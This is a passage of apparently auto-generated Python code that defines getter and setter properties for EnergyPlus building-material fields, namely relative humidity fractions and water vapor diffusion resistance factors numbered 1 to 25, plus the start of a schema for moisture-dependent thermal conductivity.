"""Corresponds to IDD field `Material Name`"""
self["Material Name"] = value
@property
def number_of_data_pairs(self):
"""field `Number of Data Pairs`
| Water Vapor Diffusion Resistance Factor
| value >= 1
| value <= 25
Args:
value (int): value for IDD Field `Number of Data Pairs`
Raises:
ValueError: if `value` is not a valid value
Returns:
int: the value of `number_of_data_pairs` or None if not set
"""
return self["Number of Data Pairs"]
@number_of_data_pairs.setter
def number_of_data_pairs(self, value=None):
"""Corresponds to IDD field `Number of Data Pairs`"""
self["Number of Data Pairs"] = value
@property
def relative_humidity_fraction_1(self):
"""field `Relative Humidity Fraction 1`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_1` or None if not set
"""
return self["Relative Humidity Fraction 1"]
@relative_humidity_fraction_1.setter
def relative_humidity_fraction_1(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 1`"""
self["Relative Humidity Fraction 1"] = value
@property
def water_vapor_diffusion_resistance_factor_1(self):
"""field `Water Vapor Diffusion Resistance Factor 1`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_1` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 1"]
@water_vapor_diffusion_resistance_factor_1.setter
def water_vapor_diffusion_resistance_factor_1(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
1`"""
self["Water Vapor Diffusion Resistance Factor 1"] = value
@property
def relative_humidity_fraction_2(self):
"""field `Relative Humidity Fraction 2`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_2` or None if not set
"""
return self["Relative Humidity Fraction 2"]
@relative_humidity_fraction_2.setter
def relative_humidity_fraction_2(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 2`"""
self["Relative Humidity Fraction 2"] = value
@property
def water_vapor_diffusion_resistance_factor_2(self):
"""field `Water Vapor Diffusion Resistance Factor 2`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_2` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 2"]
@water_vapor_diffusion_resistance_factor_2.setter
def water_vapor_diffusion_resistance_factor_2(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
2`"""
self["Water Vapor Diffusion Resistance Factor 2"] = value
@property
def relative_humidity_fraction_3(self):
"""field `Relative Humidity Fraction 3`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_3` or None if not set
"""
return self["Relative Humidity Fraction 3"]
@relative_humidity_fraction_3.setter
def relative_humidity_fraction_3(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 3`"""
self["Relative Humidity Fraction 3"] = value
@property
def water_vapor_diffusion_resistance_factor_3(self):
"""field `Water Vapor Diffusion Resistance Factor 3`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_3` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 3"]
@water_vapor_diffusion_resistance_factor_3.setter
def water_vapor_diffusion_resistance_factor_3(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
3`"""
self["Water Vapor Diffusion Resistance Factor 3"] = value
@property
def relative_humidity_fraction_4(self):
"""field `Relative Humidity Fraction 4`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_4` or None if not set
"""
return self["Relative Humidity Fraction 4"]
@relative_humidity_fraction_4.setter
def relative_humidity_fraction_4(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 4`"""
self["Relative Humidity Fraction 4"] = value
@property
def water_vapor_diffusion_resistance_factor_4(self):
"""field `Water Vapor Diffusion Resistance Factor 4`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_4` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 4"]
@water_vapor_diffusion_resistance_factor_4.setter
def water_vapor_diffusion_resistance_factor_4(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
4`"""
self["Water Vapor Diffusion Resistance Factor 4"] = value
@property
def relative_humidity_fraction_5(self):
"""field `Relative Humidity Fraction 5`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_5` or None if not set
"""
return self["Relative Humidity Fraction 5"]
@relative_humidity_fraction_5.setter
def relative_humidity_fraction_5(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 5`"""
self["Relative Humidity Fraction 5"] = value
@property
def water_vapor_diffusion_resistance_factor_5(self):
"""field `Water Vapor Diffusion Resistance Factor 5`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_5` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 5"]
@water_vapor_diffusion_resistance_factor_5.setter
def water_vapor_diffusion_resistance_factor_5(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
5`"""
self["Water Vapor Diffusion Resistance Factor 5"] = value
@property
def relative_humidity_fraction_6(self):
"""field `Relative Humidity Fraction 6`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_6` or None if not set
"""
return self["Relative Humidity Fraction 6"]
@relative_humidity_fraction_6.setter
def relative_humidity_fraction_6(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 6`"""
self["Relative Humidity Fraction 6"] = value
@property
def water_vapor_diffusion_resistance_factor_6(self):
"""field `Water Vapor Diffusion Resistance Factor 6`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_6` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 6"]
@water_vapor_diffusion_resistance_factor_6.setter
def water_vapor_diffusion_resistance_factor_6(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
6`"""
self["Water Vapor Diffusion Resistance Factor 6"] = value
@property
def relative_humidity_fraction_7(self):
"""field `Relative Humidity Fraction 7`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_7` or None if not set
"""
return self["Relative Humidity Fraction 7"]
@relative_humidity_fraction_7.setter
def relative_humidity_fraction_7(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 7`"""
self["Relative Humidity Fraction 7"] = value
@property
def water_vapor_diffusion_resistance_factor_7(self):
"""field `Water Vapor Diffusion Resistance Factor 7`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_7` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 7"]
@water_vapor_diffusion_resistance_factor_7.setter
def water_vapor_diffusion_resistance_factor_7(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
7`"""
self["Water Vapor Diffusion Resistance Factor 7"] = value
@property
def relative_humidity_fraction_8(self):
"""field `Relative Humidity Fraction 8`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_8` or None if not set
"""
return self["Relative Humidity Fraction 8"]
@relative_humidity_fraction_8.setter
def relative_humidity_fraction_8(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 8`"""
self["Relative Humidity Fraction 8"] = value
@property
def water_vapor_diffusion_resistance_factor_8(self):
"""field `Water Vapor Diffusion Resistance Factor 8`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_8` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 8"]
@water_vapor_diffusion_resistance_factor_8.setter
def water_vapor_diffusion_resistance_factor_8(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
8`"""
self["Water Vapor Diffusion Resistance Factor 8"] = value
@property
def relative_humidity_fraction_9(self):
"""field `Relative Humidity Fraction 9`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_9` or None if not set
"""
return self["Relative Humidity Fraction 9"]
@relative_humidity_fraction_9.setter
def relative_humidity_fraction_9(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 9`"""
self["Relative Humidity Fraction 9"] = value
@property
def water_vapor_diffusion_resistance_factor_9(self):
"""field `Water Vapor Diffusion Resistance Factor 9`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_9` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 9"]
@water_vapor_diffusion_resistance_factor_9.setter
def water_vapor_diffusion_resistance_factor_9(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
9`"""
self["Water Vapor Diffusion Resistance Factor 9"] = value
@property
def relative_humidity_fraction_10(self):
"""field `Relative Humidity Fraction 10`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_10` or None if not set
"""
return self["Relative Humidity Fraction 10"]
@relative_humidity_fraction_10.setter
def relative_humidity_fraction_10(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 10`"""
self["Relative Humidity Fraction 10"] = value
@property
def water_vapor_diffusion_resistance_factor_10(self):
"""field `Water Vapor Diffusion Resistance Factor 10`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_10` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 10"]
@water_vapor_diffusion_resistance_factor_10.setter
def water_vapor_diffusion_resistance_factor_10(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
10`"""
self["Water Vapor Diffusion Resistance Factor 10"] = value
@property
def relative_humidity_fraction_11(self):
"""field `Relative Humidity Fraction 11`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_11` or None if not set
"""
return self["Relative Humidity Fraction 11"]
@relative_humidity_fraction_11.setter
def relative_humidity_fraction_11(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 11`"""
self["Relative Humidity Fraction 11"] = value
@property
def water_vapor_diffusion_resistance_factor_11(self):
"""field `Water Vapor Diffusion Resistance Factor 11`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_11` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 11"]
@water_vapor_diffusion_resistance_factor_11.setter
def water_vapor_diffusion_resistance_factor_11(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
11`"""
self["Water Vapor Diffusion Resistance Factor 11"] = value
@property
def relative_humidity_fraction_12(self):
"""field `Relative Humidity Fraction 12`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_12` or None if not set
"""
return self["Relative Humidity Fraction 12"]
@relative_humidity_fraction_12.setter
def relative_humidity_fraction_12(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 12`"""
self["Relative Humidity Fraction 12"] = value
@property
def water_vapor_diffusion_resistance_factor_12(self):
"""field `Water Vapor Diffusion Resistance Factor 12`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_12` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 12"]
@water_vapor_diffusion_resistance_factor_12.setter
def water_vapor_diffusion_resistance_factor_12(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
12`"""
self["Water Vapor Diffusion Resistance Factor 12"] = value
@property
def relative_humidity_fraction_13(self):
"""field `Relative Humidity Fraction 13`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_13` or None if not set
"""
return self["Relative Humidity Fraction 13"]
@relative_humidity_fraction_13.setter
def relative_humidity_fraction_13(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 13`"""
self["Relative Humidity Fraction 13"] = value
@property
def water_vapor_diffusion_resistance_factor_13(self):
"""field `Water Vapor Diffusion Resistance Factor 13`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_13` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 13"]
@water_vapor_diffusion_resistance_factor_13.setter
def water_vapor_diffusion_resistance_factor_13(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
13`"""
self["Water Vapor Diffusion Resistance Factor 13"] = value
@property
def relative_humidity_fraction_14(self):
"""field `Relative Humidity Fraction 14`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_14` or None if not set
"""
return self["Relative Humidity Fraction 14"]
@relative_humidity_fraction_14.setter
def relative_humidity_fraction_14(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 14`"""
self["Relative Humidity Fraction 14"] = value
@property
def water_vapor_diffusion_resistance_factor_14(self):
"""field `Water Vapor Diffusion Resistance Factor 14`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_14` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 14"]
@water_vapor_diffusion_resistance_factor_14.setter
def water_vapor_diffusion_resistance_factor_14(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
14`"""
self["Water Vapor Diffusion Resistance Factor 14"] = value
@property
def relative_humidity_fraction_15(self):
"""field `Relative Humidity Fraction 15`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_15` or None if not set
"""
return self["Relative Humidity Fraction 15"]
@relative_humidity_fraction_15.setter
def relative_humidity_fraction_15(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 15`"""
self["Relative Humidity Fraction 15"] = value
@property
def water_vapor_diffusion_resistance_factor_15(self):
"""field `Water Vapor Diffusion Resistance Factor 15`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_15` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 15"]
@water_vapor_diffusion_resistance_factor_15.setter
def water_vapor_diffusion_resistance_factor_15(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
15`"""
self["Water Vapor Diffusion Resistance Factor 15"] = value
@property
def relative_humidity_fraction_16(self):
"""field `Relative Humidity Fraction 16`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_16` or None if not set
"""
return self["Relative Humidity Fraction 16"]
@relative_humidity_fraction_16.setter
def relative_humidity_fraction_16(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 16`"""
self["Relative Humidity Fraction 16"] = value
@property
def water_vapor_diffusion_resistance_factor_16(self):
"""field `Water Vapor Diffusion Resistance Factor 16`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_16` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 16"]
@water_vapor_diffusion_resistance_factor_16.setter
def water_vapor_diffusion_resistance_factor_16(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
16`"""
self["Water Vapor Diffusion Resistance Factor 16"] = value
@property
def relative_humidity_fraction_17(self):
"""field `Relative Humidity Fraction 17`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 17`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_17` or None if not set
"""
return self["Relative Humidity Fraction 17"]
@relative_humidity_fraction_17.setter
def relative_humidity_fraction_17(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 17`"""
self["Relative Humidity Fraction 17"] = value
@property
def water_vapor_diffusion_resistance_factor_17(self):
"""field `Water Vapor Diffusion Resistance Factor 17`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 17`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_17` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 17"]
@water_vapor_diffusion_resistance_factor_17.setter
def water_vapor_diffusion_resistance_factor_17(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
17`"""
self["Water Vapor Diffusion Resistance Factor 17"] = value
@property
def relative_humidity_fraction_18(self):
"""field `Relative Humidity Fraction 18`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 18`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_18` or None if not set
"""
return self["Relative Humidity Fraction 18"]
@relative_humidity_fraction_18.setter
def relative_humidity_fraction_18(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 18`"""
self["Relative Humidity Fraction 18"] = value
@property
def water_vapor_diffusion_resistance_factor_18(self):
"""field `Water Vapor Diffusion Resistance Factor 18`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 18`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_18` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 18"]
@water_vapor_diffusion_resistance_factor_18.setter
def water_vapor_diffusion_resistance_factor_18(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
18`"""
self["Water Vapor Diffusion Resistance Factor 18"] = value
@property
def relative_humidity_fraction_19(self):
"""field `Relative Humidity Fraction 19`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 19`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_19` or None if not set
"""
return self["Relative Humidity Fraction 19"]
@relative_humidity_fraction_19.setter
def relative_humidity_fraction_19(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 19`"""
self["Relative Humidity Fraction 19"] = value
@property
def water_vapor_diffusion_resistance_factor_19(self):
"""field `Water Vapor Diffusion Resistance Factor 19`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 19`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_19` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 19"]
@water_vapor_diffusion_resistance_factor_19.setter
def water_vapor_diffusion_resistance_factor_19(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
19`"""
self["Water Vapor Diffusion Resistance Factor 19"] = value
@property
def relative_humidity_fraction_20(self):
"""field `Relative Humidity Fraction 20`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 20`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_20` or None if not set
"""
return self["Relative Humidity Fraction 20"]
@relative_humidity_fraction_20.setter
def relative_humidity_fraction_20(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 20`"""
self["Relative Humidity Fraction 20"] = value
@property
def water_vapor_diffusion_resistance_factor_20(self):
"""field `Water Vapor Diffusion Resistance Factor 20`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 20`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_20` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 20"]
@water_vapor_diffusion_resistance_factor_20.setter
def water_vapor_diffusion_resistance_factor_20(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
20`"""
self["Water Vapor Diffusion Resistance Factor 20"] = value
@property
def relative_humidity_fraction_21(self):
"""field `Relative Humidity Fraction 21`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 21`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_21` or None if not set
"""
return self["Relative Humidity Fraction 21"]
@relative_humidity_fraction_21.setter
def relative_humidity_fraction_21(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 21`"""
self["Relative Humidity Fraction 21"] = value
@property
def water_vapor_diffusion_resistance_factor_21(self):
"""field `Water Vapor Diffusion Resistance Factor 21`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 21`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_21` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 21"]
@water_vapor_diffusion_resistance_factor_21.setter
def water_vapor_diffusion_resistance_factor_21(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
21`"""
self["Water Vapor Diffusion Resistance Factor 21"] = value
@property
def relative_humidity_fraction_22(self):
"""field `Relative Humidity Fraction 22`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 22`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_22` or None if not set
"""
return self["Relative Humidity Fraction 22"]
@relative_humidity_fraction_22.setter
def relative_humidity_fraction_22(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 22`"""
self["Relative Humidity Fraction 22"] = value
@property
def water_vapor_diffusion_resistance_factor_22(self):
"""field `Water Vapor Diffusion Resistance Factor 22`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 22`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_22` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 22"]
@water_vapor_diffusion_resistance_factor_22.setter
def water_vapor_diffusion_resistance_factor_22(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
22`"""
self["Water Vapor Diffusion Resistance Factor 22"] = value
@property
def relative_humidity_fraction_23(self):
"""field `Relative Humidity Fraction 23`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 23`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_23` or None if not set
"""
return self["Relative Humidity Fraction 23"]
@relative_humidity_fraction_23.setter
def relative_humidity_fraction_23(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 23`"""
self["Relative Humidity Fraction 23"] = value
@property
def water_vapor_diffusion_resistance_factor_23(self):
"""field `Water Vapor Diffusion Resistance Factor 23`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 23`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_23` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 23"]
@water_vapor_diffusion_resistance_factor_23.setter
def water_vapor_diffusion_resistance_factor_23(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
23`"""
self["Water Vapor Diffusion Resistance Factor 23"] = value
@property
def relative_humidity_fraction_24(self):
"""field `Relative Humidity Fraction 24`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 24`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_24` or None if not set
"""
return self["Relative Humidity Fraction 24"]
@relative_humidity_fraction_24.setter
def relative_humidity_fraction_24(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 24`"""
self["Relative Humidity Fraction 24"] = value
@property
def water_vapor_diffusion_resistance_factor_24(self):
"""field `Water Vapor Diffusion Resistance Factor 24`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 24`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_24` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 24"]
@water_vapor_diffusion_resistance_factor_24.setter
def water_vapor_diffusion_resistance_factor_24(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
24`"""
self["Water Vapor Diffusion Resistance Factor 24"] = value
@property
def relative_humidity_fraction_25(self):
"""field `Relative Humidity Fraction 25`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 25`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_25` or None if not set
"""
return self["Relative Humidity Fraction 25"]
@relative_humidity_fraction_25.setter
def relative_humidity_fraction_25(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 25`"""
self["Relative Humidity Fraction 25"] = value
@property
def water_vapor_diffusion_resistance_factor_25(self):
"""field `Water Vapor Diffusion Resistance Factor 25`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 25`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_25` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 25"]
@water_vapor_diffusion_resistance_factor_25.setter
def water_vapor_diffusion_resistance_factor_25(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
25`"""
self["Water Vapor Diffusion Resistance Factor 25"] = value
class MaterialPropertyHeatAndMoistureTransferThermalConductivity(DataObject):
""" Corresponds to IDD object `MaterialProperty:HeatAndMoistureTransfer:ThermalConductivity`
HeatBalanceAlgorithm = CombinedHeatAndMoistureFiniteElement solution algorithm only.
Relationship between thermal conductivity and moisture content
Has no effect with other HeatBalanceAlgorithm solution algorithms
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'material name',
{'name': u'Material Name',
'pyname': u'material_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'number of thermal coordinates',
{'name': u'Number of Thermal Coordinates',
'pyname': u'number_of_thermal_coordinates',
'maximum': 25,
'required-field': True,
'autosizable': False,
'minimum': 1,
'autocalculatable': False,
'type': u'integer'}),
(u'moisture content 1',
{'name': u'Moisture Content 1',
'pyname': u'moisture_content_1',
'required-field': True,
'autosizable': False,
'minimum': 0.0,
